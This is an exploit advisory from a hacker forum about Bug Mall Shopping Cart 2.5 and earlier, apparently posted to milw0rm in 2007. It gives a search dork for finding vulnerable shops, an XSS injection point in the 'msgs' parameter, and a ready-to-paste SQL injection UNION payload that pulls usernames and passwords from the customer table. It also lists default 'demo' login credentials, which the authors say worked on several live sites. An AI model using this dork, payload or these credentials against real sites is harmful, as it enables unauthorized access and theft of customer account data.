--==+================================================================================+==--
--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)
SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip
ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834
SITE: http://www.bug-mall.org
DORK: Powered by Bug Software intext:Your Cart Contains
EXPLOITS:
EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites
and sucsefully logged in.
EXAMPLES:
EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=
VULN BY
t0pP8uZz
h4cky0u.org
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=
EXAMPLE 3: Paste following into search box
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*
Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.
GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net
FROM GM!: Kw3[R]ln get over it :D.
--==+================================================================================+==--
--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--
--==+================================================================================+==--
# milw0rm.com [2007-06-25]